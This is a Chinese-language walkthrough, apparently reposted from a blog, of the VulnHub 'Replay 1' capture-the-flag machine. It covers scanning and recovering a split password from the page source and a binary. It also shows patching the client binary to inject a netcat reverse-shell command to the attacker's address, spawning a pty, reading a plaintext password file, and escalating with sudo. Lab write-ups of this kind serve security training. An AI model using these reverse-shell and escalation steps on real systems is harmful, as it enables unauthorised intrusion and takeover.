自学内容网 自学内容网

vulnhub-Replay 1靶机

vulnhub:https://www.vulnhub.com/entry/replay-1,278/

导入靶机,放在kali同网段,扫描

image-20240927085646526

靶机在192.168.81.8,扫描端口

image-20240927085717794

开启了三个端口,存在网站服务,访问

image-20240927085835062

网页上有个超链接,点击后下载了这样一个文档文件

image-20240927085943383

网页元素里有这么一行

image-20240927090031783

P1:qGQjwO4h6g,目前作用未知,扫描网站目录

image-20240927090210763

扫到几个,查看一下,files和media都是网页直接能访问到的东西,没啥用,robots指出一个新的文件

image-20240927090444656

下载下来,解压出来一个文档和一个程序

image-20240927090558546

文档里没有有用的内容,当以字符串查看程序时找到这样一句话

image-20240927090822043

之前找到一个P1,应该是要和这个拼接成一个密码

qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul

现在尝试运行程序

image-20240927091414781

输入IP和密码后成功执行,但是输入命令时又提示不允许

image-20240927091452105

看了网上的分析这个程序实际上执行的是文件里的whoami,修改为uname -a,同时删除as后的冒号和空格

image-20240927091723618

image-20240927092315522

保存后再次执行

image-20240927092515735

这次这里显示的就不是Bob,而是新写入的命令,所以我们写入反弹shell的命令,但是要注意写入时要让文件大小不变,所以需要插入额外的字符

nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;

image-20240927093027814

kali开启监听,再次执行程序

image-20240927093155844

获得shell,生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

sudo命令需要密码,找找看

在bob家目录的文档文件夹下的.ftp文件夹找到了bob的密码文档

image-20240927093442062

b0bcat_1234567890

image-20240927093630304

显示我们可以用所有的sudo命令,sudo su提权

image-20240927093658680

flag在根文件夹

image-20240927093746001


原文地址:https://blog.csdn.net/wjSteve/article/details/142678825

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!